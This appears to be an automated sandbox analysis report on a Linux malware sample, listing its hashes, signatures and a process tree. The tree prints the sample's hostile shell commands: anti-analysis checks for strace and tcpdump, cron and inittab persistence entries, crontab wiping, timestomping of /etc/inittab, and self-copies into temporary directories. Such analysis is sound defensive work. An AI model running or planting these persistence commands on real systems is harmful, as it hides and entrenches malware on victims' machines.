Analysis

  • max time kernel
    0s
  • max time network
    102s
  • platform
    linux_amd64
  • resource
    ubuntu1804-amd64-en-20211208
  • submitted
    14-03-2022 03:23

General

  • Target

    60f50372901a3ab6be093cb9922fd75c

  • Size

    90KB

  • MD5

    60f50372901a3ab6be093cb9922fd75c

  • SHA1

    03fabbbc736a5c59b889e3675331c96263d4a4a6

  • SHA256

    16b4093813e2923e9ee70b888f0d50f972ac607253b00f25e4be44993d263bd2

  • SHA512

    480ce401e171d29483b5ddf2b732f8959daba11c8b25538d179cc93795594676aaec3ae078cd312743a9cecf78ba533a58ced339fa63e2b5e53b9077933d0e6b

Score
5/10

Malware Config

Signatures

  • Reads runtime system information 4 IoCs

    Reads data from the /proc virtual filesystem.

  • Writes file to tmp directory 4 IoCs

    Malware often drops the files it needs into the /tmp directory. In this run the sample copies itself from /tmp into /dev/shm, /var/tmp, /var/lock and /var/run (see the cp processes in the tree below).

Processes

  • ./60f50372901a3ab6be093cb9922fd75c
    ./60f50372901a3ab6be093cb9922fd75c
    1⤵
      PID:593
    • /bin/sh
      sh -c "pidof -x strace > /dev/null"
      1⤵
        PID:594
        • /bin/pidof
          pidof -x strace
          2⤵
            PID:595
        • /bin/sh
          sh -c "pidof -x tcpdump > /dev/null"
          1⤵
            PID:596
            • /bin/pidof
              pidof -x tcpdump
              2⤵
                PID:597
            • /bin/sh
              sh -c "cat /etc/inittab | grep -v \"/tmp/60f50372901a3ab6be093cb9922fd75c\" > /etc/inittab2"
              1⤵
                PID:600
                • /bin/cat
                  cat /etc/inittab
                  2⤵
                    PID:602
                  • /bin/grep
                    grep -v /tmp/60f50372901a3ab6be093cb9922fd75c
                    2⤵
                      PID:605
                  • /bin/sh
                    sh -c "crontab -l | grep /tmp/60f50372901a3ab6be093cb9922fd75c | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/60f50372901a3ab6be093cb9922fd75c > /dev/null 2>&1 &\") | crontab -"
                    1⤵
                      PID:601
                      • /usr/bin/crontab
                        crontab -l
                        2⤵
                          PID:604
                        • /bin/grep
                          grep /tmp/60f50372901a3ab6be093cb9922fd75c
                          2⤵
                            PID:607
                          • /bin/grep
                            grep -v "no cron"
                            2⤵
                              PID:608
                            • /usr/bin/crontab
                              crontab -
                              2⤵
                                PID:611
                            • /bin/sh
                              sh -c "crontab -r"
                              1⤵
                                PID:603
                                • /usr/bin/crontab
                                  crontab -r
                                  2⤵
                                    PID:606
                                • /bin/sh
                                  sh -c "echo \"0:2345:respawn:/tmp/60f50372901a3ab6be093cb9922fd75c\" >> /etc/inittab2"
                                  1⤵
                                    PID:609
                                  • /bin/sh
                                    sh -c "cat /etc/inittab2 > /etc/inittab"
                                    1⤵
                                      PID:612
                                      • /bin/cat
                                        cat /etc/inittab2
                                        2⤵
                                          PID:614
                                      • /usr/bin/crontab
                                        crontab -l
                                        1⤵
                                          PID:613
                                        • /bin/sh
                                          sh -c "rm -rf /etc/inittab2"
                                          1⤵
                                            PID:615
                                            • /bin/rm
                                              rm -rf /etc/inittab2
                                              2⤵
                                                PID:616
                                            • /bin/sh
                                              sh -c "touch -acmr /bin/ls /etc/inittab"
                                              1⤵
                                                PID:617
                                                • /usr/bin/touch
                                                  touch -acmr /bin/ls /etc/inittab
                                                  2⤵
                                                    PID:618
                                                • /bin/sh
                                                  sh -c "/bin/uname -n"
                                                  1⤵
                                                    PID:625
                                                    • /bin/uname
                                                      /bin/uname -n
                                                      2⤵
                                                        PID:627
                                                    • /bin/sh
                                                      sh -c "cp -f /tmp/60f50372901a3ab6be093cb9922fd75c /dev/shm/60f50372901a3ab6be093cb9922fd75c"
                                                      1⤵
                                                        PID:626
                                                        • /bin/cp
                                                          cp -f /tmp/60f50372901a3ab6be093cb9922fd75c /dev/shm/60f50372901a3ab6be093cb9922fd75c
                                                          2⤵
                                                          • Reads runtime system information
                                                          • Writes file to tmp directory
                                                          PID:628
                                                      • /bin/sh
                                                        sh -c "cat /etc/inittab | grep -v \"/dev/shm/60f50372901a3ab6be093cb9922fd75c\" > /etc/inittab2"
                                                        1⤵
                                                          PID:630
                                                          • /bin/grep
                                                            grep -v /dev/shm/60f50372901a3ab6be093cb9922fd75c
                                                            2⤵
                                                              PID:633
                                                            • /bin/cat
                                                              cat /etc/inittab
                                                              2⤵
                                                                PID:632
                                                            • /bin/sh
                                                              sh -c "crontab -l | grep /dev/shm/60f50372901a3ab6be093cb9922fd75c | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/60f50372901a3ab6be093cb9922fd75c > /dev/null 2>&1 &\") | crontab -"
                                                              1⤵
                                                                PID:631
                                                                • /usr/bin/crontab
                                                                  crontab -l
                                                                  2⤵
                                                                    PID:634
                                                                  • /bin/grep
                                                                    grep /dev/shm/60f50372901a3ab6be093cb9922fd75c
                                                                    2⤵
                                                                      PID:635
                                                                    • /bin/grep
                                                                      grep -v "no cron"
                                                                      2⤵
                                                                        PID:637
                                                                      • /usr/bin/crontab
                                                                        crontab -
                                                                        2⤵
                                                                          PID:641
                                                                      • /bin/sh
                                                                        sh -c "echo \"0:2345:respawn:/dev/shm/60f50372901a3ab6be093cb9922fd75c\" >> /etc/inittab2"
                                                                        1⤵
                                                                          PID:636
                                                                        • /bin/sh
                                                                          sh -c "cat /etc/inittab2 > /etc/inittab"
                                                                          1⤵
                                                                            PID:638
                                                                            • /bin/cat
                                                                              cat /etc/inittab2
                                                                              2⤵
                                                                                PID:639
                                                                            • /usr/bin/crontab
                                                                              crontab -l
                                                                              1⤵
                                                                                PID:642
                                                                              • /bin/sh
                                                                                sh -c "rm -rf /etc/inittab2"
                                                                                1⤵
                                                                                  PID:643
                                                                                  • /bin/rm
                                                                                    rm -rf /etc/inittab2
                                                                                    2⤵
                                                                                      PID:644
                                                                                  • /bin/sh
                                                                                    sh -c "touch -acmr /bin/ls /etc/inittab"
                                                                                    1⤵
                                                                                      PID:645
                                                                                      • /usr/bin/touch
                                                                                        touch -acmr /bin/ls /etc/inittab
                                                                                        2⤵
                                                                                          PID:646
                                                                                      • /bin/sh
                                                                                        sh -c "cp -f /tmp/60f50372901a3ab6be093cb9922fd75c /var/tmp/60f50372901a3ab6be093cb9922fd75c"
                                                                                        1⤵
                                                                                          PID:647
                                                                                          • /bin/cp
                                                                                            cp -f /tmp/60f50372901a3ab6be093cb9922fd75c /var/tmp/60f50372901a3ab6be093cb9922fd75c
                                                                                            2⤵
                                                                                            • Reads runtime system information
                                                                                            • Writes file to tmp directory
                                                                                            PID:648
                                                                                        • /bin/sh
                                                                                          sh -c "cat /etc/inittab | grep -v \"/var/tmp/60f50372901a3ab6be093cb9922fd75c\" > /etc/inittab2"
                                                                                          1⤵
                                                                                            PID:650
                                                                                            • /bin/cat
                                                                                              cat /etc/inittab
                                                                                              2⤵
                                                                                                PID:651
                                                                                              • /bin/grep
                                                                                                grep -v /var/tmp/60f50372901a3ab6be093cb9922fd75c
                                                                                                2⤵
                                                                                                  PID:654
                                                                                              • /bin/sh
                                                                                                sh -c "crontab -l | grep /var/tmp/60f50372901a3ab6be093cb9922fd75c | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/60f50372901a3ab6be093cb9922fd75c > /dev/null 2>&1 &\") | crontab -"
                                                                                                1⤵
                                                                                                  PID:652
                                                                                                  • /usr/bin/crontab
                                                                                                    crontab -l
                                                                                                    2⤵
                                                                                                      PID:653
                                                                                                    • /bin/grep
                                                                                                      grep /var/tmp/60f50372901a3ab6be093cb9922fd75c
                                                                                                      2⤵
                                                                                                        PID:655
                                                                                                      • /bin/grep
                                                                                                        grep -v "no cron"
                                                                                                        2⤵
                                                                                                          PID:657
                                                                                                        • /usr/bin/crontab
                                                                                                          crontab -
                                                                                                          2⤵
                                                                                                            PID:660
                                                                                                        • /bin/sh
                                                                                                          sh -c "echo \"0:2345:respawn:/var/tmp/60f50372901a3ab6be093cb9922fd75c\" >> /etc/inittab2"
                                                                                                          1⤵
                                                                                                            PID:656
                                                                                                          • /bin/sh
                                                                                                            sh -c "cat /etc/inittab2 > /etc/inittab"
                                                                                                            1⤵
                                                                                                              PID:658
                                                                                                              • /bin/cat
                                                                                                                cat /etc/inittab2
                                                                                                                2⤵
                                                                                                                  PID:661
                                                                                                              • /usr/bin/crontab
                                                                                                                crontab -l
                                                                                                                1⤵
                                                                                                                  PID:662
                                                                                                                • /bin/sh
                                                                                                                  sh -c "rm -rf /etc/inittab2"
                                                                                                                  1⤵
                                                                                                                    PID:663
                                                                                                                    • /bin/rm
                                                                                                                      rm -rf /etc/inittab2
                                                                                                                      2⤵
                                                                                                                        PID:664
                                                                                                                    • /bin/sh
                                                                                                                      sh -c "touch -acmr /bin/ls /etc/inittab"
                                                                                                                      1⤵
                                                                                                                        PID:665
                                                                                                                        • /usr/bin/touch
                                                                                                                          touch -acmr /bin/ls /etc/inittab
                                                                                                                          2⤵
                                                                                                                            PID:666
                                                                                                                        • /bin/sh
                                                                                                                          sh -c "cp -f /tmp/60f50372901a3ab6be093cb9922fd75c /var/lock/60f50372901a3ab6be093cb9922fd75c"
                                                                                                                          1⤵
                                                                                                                            PID:667
                                                                                                                            • /bin/cp
                                                                                                                              cp -f /tmp/60f50372901a3ab6be093cb9922fd75c /var/lock/60f50372901a3ab6be093cb9922fd75c
                                                                                                                              2⤵
                                                                                                                              • Reads runtime system information
                                                                                                                              • Writes file to tmp directory
                                                                                                                              PID:668
                                                                                                                          • /bin/sh
                                                                                                                            sh -c "cat /etc/inittab | grep -v \"/var/lock/60f50372901a3ab6be093cb9922fd75c\" > /etc/inittab2"
                                                                                                                            1⤵
                                                                                                                              PID:670
                                                                                                                              • /bin/cat
                                                                                                                                cat /etc/inittab
                                                                                                                                2⤵
                                                                                                                                  PID:671
                                                                                                                                • /bin/grep
                                                                                                                                  grep -v /var/lock/60f50372901a3ab6be093cb9922fd75c
                                                                                                                                  2⤵
                                                                                                                                    PID:673
                                                                                                                                • /bin/sh
                                                                                                                                  sh -c "crontab -l | grep /var/lock/60f50372901a3ab6be093cb9922fd75c | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/60f50372901a3ab6be093cb9922fd75c > /dev/null 2>&1 &\") | crontab -"
                                                                                                                                  1⤵
                                                                                                                                    PID:672
                                                                                                                                    • /usr/bin/crontab
                                                                                                                                      crontab -l
                                                                                                                                      2⤵
                                                                                                                                        PID:674
                                                                                                                                      • /bin/grep
                                                                                                                                        grep /var/lock/60f50372901a3ab6be093cb9922fd75c
                                                                                                                                        2⤵
                                                                                                                                          PID:675
                                                                                                                                        • /bin/grep
                                                                                                                                          grep -v "no cron"
                                                                                                                                          2⤵
                                                                                                                                            PID:677
                                                                                                                                          • /usr/bin/crontab
                                                                                                                                            crontab -
                                                                                                                                            2⤵
                                                                                                                                              PID:680
                                                                                                                                          • /bin/sh
                                                                                                                                            sh -c "echo \"0:2345:respawn:/var/lock/60f50372901a3ab6be093cb9922fd75c\" >> /etc/inittab2"
                                                                                                                                            1⤵
                                                                                                                                              PID:676
                                                                                                                                            • /bin/sh
                                                                                                                                              sh -c "cat /etc/inittab2 > /etc/inittab"
                                                                                                                                              1⤵
                                                                                                                                                PID:678
                                                                                                                                                • /bin/cat
                                                                                                                                                  cat /etc/inittab2
                                                                                                                                                  2⤵
                                                                                                                                                    PID:681
                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                  crontab -l
                                                                                                                                                  1⤵
                                                                                                                                                    PID:682
                                                                                                                                                  • /bin/sh
                                                                                                                                                    sh -c "rm -rf /etc/inittab2"
                                                                                                                                                    1⤵
                                                                                                                                                      PID:683
                                                                                                                                                      • /bin/rm
                                                                                                                                                        rm -rf /etc/inittab2
                                                                                                                                                        2⤵
                                                                                                                                                          PID:684
                                                                                                                                                      • /bin/sh
                                                                                                                                                        sh -c "touch -acmr /bin/ls /etc/inittab"
                                                                                                                                                        1⤵
                                                                                                                                                          PID:685
                                                                                                                                                          • /usr/bin/touch
                                                                                                                                                            touch -acmr /bin/ls /etc/inittab
                                                                                                                                                            2⤵
                                                                                                                                                              PID:686
                                                                                                                                                          • /bin/sh
                                                                                                                                                            sh -c "cp -f /tmp/60f50372901a3ab6be093cb9922fd75c /var/run/60f50372901a3ab6be093cb9922fd75c"
                                                                                                                                                            1⤵
                                                                                                                                                              PID:687
                                                                                                                                                              • /bin/cp
                                                                                                                                                                cp -f /tmp/60f50372901a3ab6be093cb9922fd75c /var/run/60f50372901a3ab6be093cb9922fd75c
                                                                                                                                                                2⤵
                                                                                                                                                                • Reads runtime system information
                                                                                                                                                                • Writes file to tmp directory
                                                                                                                                                                PID:688
                                                                                                                                                            • /bin/sh
                                                                                                                                                              sh -c "cat /etc/inittab | grep -v \"/var/run/60f50372901a3ab6be093cb9922fd75c\" > /etc/inittab2"
                                                                                                                                                              1⤵
                                                                                                                                                                PID:690
                                                                                                                                                                • /bin/grep
                                                                                                                                                                  grep -v /var/run/60f50372901a3ab6be093cb9922fd75c
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:693
                                                                                                                                                                  • /bin/cat
                                                                                                                                                                    cat /etc/inittab
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:692
                                                                                                                                                                  • /bin/sh
                                                                                                                                                                    sh -c "crontab -l | grep /var/run/60f50372901a3ab6be093cb9922fd75c | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/60f50372901a3ab6be093cb9922fd75c > /dev/null 2>&1 &\") | crontab -"
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:691
                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                        crontab -l
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:694
                                                                                                                                                                        • /bin/grep
                                                                                                                                                                          grep /var/run/60f50372901a3ab6be093cb9922fd75c
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:695
                                                                                                                                                                          • /bin/grep
                                                                                                                                                                            grep -v "no cron"
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:697
                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                              crontab -
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:701
                                                                                                                                                                            • /bin/sh
                                                                                                                                                                              sh -c "echo \"0:2345:respawn:/var/run/60f50372901a3ab6be093cb9922fd75c\" >> /etc/inittab2"
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:696
                                                                                                                                                                              • /bin/sh
                                                                                                                                                                                sh -c "cat /etc/inittab2 > /etc/inittab"
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:698
                                                                                                                                                                                  • /bin/cat
                                                                                                                                                                                    cat /etc/inittab2
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:699
                                                                                                                                                                                  • /usr/bin/crontab
                                                                                                                                                                                    crontab -l
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:702
                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                      sh -c "rm -rf /etc/inittab2"
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:703
                                                                                                                                                                                        • /bin/rm
                                                                                                                                                                                          rm -rf /etc/inittab2
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:704
                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                          sh -c "touch -acmr /bin/ls /etc/inittab"
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:705
                                                                                                                                                                                            • /usr/bin/touch
                                                                                                                                                                                              touch -acmr /bin/ls /etc/inittab
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:706

                                                                                                                                                                                            Network

                                                                                                                                                                                            MITRE ATT&CK Matrix


                                                                                                                                                                                            Downloads